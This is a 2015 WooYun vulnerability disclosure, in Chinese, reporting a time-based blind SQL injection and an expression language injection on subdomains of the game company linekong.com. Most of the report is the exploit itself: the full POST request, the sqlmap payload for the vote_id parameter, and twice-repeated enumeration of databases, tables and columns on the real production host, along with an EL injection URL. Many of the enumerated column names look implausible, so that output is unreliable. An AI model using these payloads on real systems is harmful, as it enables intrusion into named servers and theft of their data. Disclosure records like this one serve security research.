当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126333

漏洞标题:蓝港在线某子站SQL注入

相关厂商:linekong.com

漏洞作者: Ysql404

提交时间:2015-07-13 12:06

修复时间:2015-07-18 12:08

公开时间:2015-07-18 12:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

蓝港在线某子站基于时间的盲注;另一子站存在Expression language injection

详细说明:

1、漏洞地址:http://yt.linekong.com/lottery/panda/vote_xml.php

POST /lottery/panda/vote_xml.php?timeStame=1436664476447n9198 HTTP/1.1
Content-Length: 150
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://yt.linekong.com/
Host: yt.linekong.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
voteOption=6139&vote_id=80


参数:vote_id存在注入

POST parameter 'vote_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 3692 HTTP(s) requests:
---
Place: POST
Parameter: vote_id
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: voteOption=6139&vote_id=80'||(SELECT 'xWhr' FROM DUAL WHERE 4985=4985 AND SLEEP(5) )||'
---
[14:30:05] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] `in`ormatiq\x0c_schemaA`
[*] yt_wgb


Database: yt_wgb
[22 tables]
+-------------------------+
| CPG_bridge              |
| DEPARTMENT              |
| Service                 |
| TBLTRANSACTIONS         |
| admin_login             |
| administer              |
| administration          |
| administrator           |
| agent                   |
| akhbar                  |
| apartments              |
| app_user                |
| banned_users            |
| binn_cform              |
| cell_line               |
| control                 |
| cv_countries            |
| dtb_bat_order_daily_age |
| ipblocks                |
| keyboards               |
| nuke_autonews           |
| spip_index_dico         |
+-------------------------+


Database: yt_wgb
Table: admin_login
[60 columns]
+----------------------+-------------+
| Column               | Type        |
+----------------------+-------------+
| caroline-du-nord     | numeric     |
| adminemail           | numeric     |
| arch                 | numeric     |
| area                 | numeric     |
| attributecategory_id | numeric     |
| ava_disciplina       | numeric     |
| bb_id                | numeric     |
| bijouxn              | numeric     |
| bio                  | numeric     |
| bloc_id              | numeric     |
| cachename            | numeric     |
| child_cfg            | numeric     |
| clientno             | numeric     |
| de                   | numeric     |
| desd_xforo           | numeric     |
| fichier              | non-numeric |
| fldfunhref           | numeric     |
| fldfunid             | numeric     |
| fldfunmemo           | numeric     |
| fldfunname           | numeric     |
| former               | numeric     |
| id_article           | numeric     |
| id_breve             | numeric     |
| id_forum             | numeric     |
| id_message           | numeric     |
| id_page              | numeric     |
| id_rubrique          | numeric     |
| id_syndic            | numeric     |
| idmedicofamiglia     | numeric     |
| inv_id               | numeric     |
| job_title            | numeric     |
| k_id                 | numeric     |
| lastposttime         | numeric     |
| liste                | numeric     |
| main_comment         | numeric     |
| medalid              | numeric     |
| mm                   | numeric     |
| module_code          | numeric     |
| motto                | numeric     |
| nroordine            | numeric     |
| nt_id                | numeric     |
| our_loc              | numeric     |
| parent_id            | numeric     |
| payid                | numeric     |
| pluginhookid         | numeric     |
| pluginid             | numeric     |
| press                | numeric     |
| product_list         | numeric     |
| propertyno           | numeric     |
| publisher            | numeric     |
| recherche            | numeric     |
| subdivision_name     | numeric     |
| summaprihod          | numeric     |
| ticker               | numeric     |
| title_id             | numeric     |
| titre                | numeric     |
| totfasciaeuroid      | numeric     |
| utilisateurs         | numeric     |
| website              | numeric     |
| xfase                | numeric     |
+----------------------+-------------+


Database: yt_wgb
Table: administrator
[13 columns]
+----------------+---------+
| Column         | Type    |
+----------------+---------+
| group          | numeric |
| account_number | numeric |
| codigo         | numeric |
| essn           | numeric |
| gab_pergunta   | numeric |
| jml            | numeric |
| maty_id        | numeric |
| pass           | numeric |
| user_pass      | numeric |
| userid         | numeric |
| utilizzatore   | numeric |
| word           | numeric |
| xprognostico   | numeric |
+----------------+---------+


Database: yt_wgb
Table: app_user
[50 columns]
+-------------------------+---------+
| Column                  | Type    |
+-------------------------+---------+
| am_id                   | numeric |
| an                      | numeric |
| at_id                   | numeric |
| ba_num_reads            | numeric |
| bfs_id                  | numeric |
| blogcommentsaccess      | numeric |
| blogcommentssub         | numeric |
| bml_id                  | numeric |
| bms_cat_id              | numeric |
| bs_setting              | numeric |
| campo_bol               | numeric |
| codeid                  | numeric |
| contacts                | numeric |
| cost_id                 | numeric |
| dis_codigo              | numeric |
| distip                  | numeric |
| field3                  | numeric |
| fjalekalimin            | numeric |
| gmail                   | numeric |
| grfilt                  | numeric |
| hdesc                   | numeric |
| id_photo                | numeric |
| idclassificatore        | numeric |
| idgroup                 | numeric |
| manufacturer            | numeric |
| message                 | numeric |
| mod_date                | numeric |
| mod_flipper_img_rotator | numeric |
| mod_jt_slideshow        | numeric |
| noteaccettazione        | numeric |
| nrcandi                 | numeric |
| ostdate                 | numeric |
| pasword                 | numeric |
| perid                   | numeric |
| prepend_digits          | numeric |
| progetto                | numeric |
| prz_merce               | numeric |
| sb_pwd                  | numeric |
| sd                      | numeric |
| sender                  | numeric |
| sklad                   | numeric |
| smilie_id               | numeric |
| solicitante_id          | numeric |
| t1                      | numeric |
| t2                      | numeric |
| tanggal                 | numeric |
| tenquanly               | numeric |
| term_id                 | numeric |
| top                     | numeric |
| us_id                   | numeric |
+-------------------------+---------+


2、http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
参数gameMainId存在Expression language injection,可造成敏感信息泄漏,之前提交过未完全修复;
具体见: WooYun: 蓝港在线某子站Expression language injection及远程命令执行漏洞

漏洞证明:

available databases [2]:
[*] `in`ormatiq\x0c_schemaA`
[*] yt_wgb


Database: yt_wgb
[22 tables]
+-------------------------+
| CPG_bridge              |
| DEPARTMENT              |
| Service                 |
| TBLTRANSACTIONS         |
| admin_login             |
| administer              |
| administration          |
| administrator           |
| agent                   |
| akhbar                  |
| apartments              |
| app_user                |
| banned_users            |
| binn_cform              |
| cell_line               |
| control                 |
| cv_countries            |
| dtb_bat_order_daily_age |
| ipblocks                |
| keyboards               |
| nuke_autonews           |
| spip_index_dico         |
+-------------------------+


Database: yt_wgb
Table: admin_login
[60 columns]
+----------------------+-------------+
| Column               | Type        |
+----------------------+-------------+
| caroline-du-nord     | numeric     |
| adminemail           | numeric     |
| arch                 | numeric     |
| area                 | numeric     |
| attributecategory_id | numeric     |
| ava_disciplina       | numeric     |
| bb_id                | numeric     |
| bijouxn              | numeric     |
| bio                  | numeric     |
| bloc_id              | numeric     |
| cachename            | numeric     |
| child_cfg            | numeric     |
| clientno             | numeric     |
| de                   | numeric     |
| desd_xforo           | numeric     |
| fichier              | non-numeric |
| fldfunhref           | numeric     |
| fldfunid             | numeric     |
| fldfunmemo           | numeric     |
| fldfunname           | numeric     |
| former               | numeric     |
| id_article           | numeric     |
| id_breve             | numeric     |
| id_forum             | numeric     |
| id_message           | numeric     |
| id_page              | numeric     |
| id_rubrique          | numeric     |
| id_syndic            | numeric     |
| idmedicofamiglia     | numeric     |
| inv_id               | numeric     |
| job_title            | numeric     |
| k_id                 | numeric     |
| lastposttime         | numeric     |
| liste                | numeric     |
| main_comment         | numeric     |
| medalid              | numeric     |
| mm                   | numeric     |
| module_code          | numeric     |
| motto                | numeric     |
| nroordine            | numeric     |
| nt_id                | numeric     |
| our_loc              | numeric     |
| parent_id            | numeric     |
| payid                | numeric     |
| pluginhookid         | numeric     |
| pluginid             | numeric     |
| press                | numeric     |
| product_list         | numeric     |
| propertyno           | numeric     |
| publisher            | numeric     |
| recherche            | numeric     |
| subdivision_name     | numeric     |
| summaprihod          | numeric     |
| ticker               | numeric     |
| title_id             | numeric     |
| titre                | numeric     |
| totfasciaeuroid      | numeric     |
| utilisateurs         | numeric     |
| website              | numeric     |
| xfase                | numeric     |
+----------------------+-------------+


Database: yt_wgb
Table: administrator
[13 columns]
+----------------+---------+
| Column         | Type    |
+----------------+---------+
| group          | numeric |
| account_number | numeric |
| codigo         | numeric |
| essn           | numeric |
| gab_pergunta   | numeric |
| jml            | numeric |
| maty_id        | numeric |
| pass           | numeric |
| user_pass      | numeric |
| userid         | numeric |
| utilizzatore   | numeric |
| word           | numeric |
| xprognostico   | numeric |
+----------------+---------+


Database: yt_wgb
Table: app_user
[50 columns]
+-------------------------+---------+
| Column                  | Type    |
+-------------------------+---------+
| am_id                   | numeric |
| an                      | numeric |
| at_id                   | numeric |
| ba_num_reads            | numeric |
| bfs_id                  | numeric |
| blogcommentsaccess      | numeric |
| blogcommentssub         | numeric |
| bml_id                  | numeric |
| bms_cat_id              | numeric |
| bs_setting              | numeric |
| campo_bol               | numeric |
| codeid                  | numeric |
| contacts                | numeric |
| cost_id                 | numeric |
| dis_codigo              | numeric |
| distip                  | numeric |
| field3                  | numeric |
| fjalekalimin            | numeric |
| gmail                   | numeric |
| grfilt                  | numeric |
| hdesc                   | numeric |
| id_photo                | numeric |
| idclassificatore        | numeric |
| idgroup                 | numeric |
| manufacturer            | numeric |
| message                 | numeric |
| mod_date                | numeric |
| mod_flipper_img_rotator | numeric |
| mod_jt_slideshow        | numeric |
| noteaccettazione        | numeric |
| nrcandi                 | numeric |
| ostdate                 | numeric |
| pasword                 | numeric |
| perid                   | numeric |
| prepend_digits          | numeric |
| progetto                | numeric |
| prz_merce               | numeric |
| sb_pwd                  | numeric |
| sd                      | numeric |
| sender                  | numeric |
| sklad                   | numeric |
| smilie_id               | numeric |
| solicitante_id          | numeric |
| t1                      | numeric |
| t2                      | numeric |
| tanggal                 | numeric |
| tenquanly               | numeric |
| term_id                 | numeric |
| top                     | numeric |
| us_id                   | numeric |
+-------------------------+---------+


2、http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126}
参数gameMainId存在Expression language injection,可造成敏感信息泄漏,之前提交过未完全修复;
具体见: WooYun: 蓝港在线某子站Expression language injection及远程命令执行漏洞

修复方案:

数据跑起来太慢了未继续测试;

版权声明:转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-18 12:08

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-07-30 19:50 | 乌云一朵朵 ( 路人 | Rank:0 漏洞数:1 | 看那乌云一朵朵。)

    @Ysql404 sqlmap导出数据时中文是乱码怎么解决,已经在sqlmap.py里面第二行添加了 #-*-coding:utf-8-*- 但是不起作用

  2. 2015-07-31 10:00 | Ysql404 ( 实习白帽子 | Rank:95 漏洞数:16 | 。。。。。。。。。。。)

    @乌云一朵朵 不清楚哦,我没遇到过,我是小白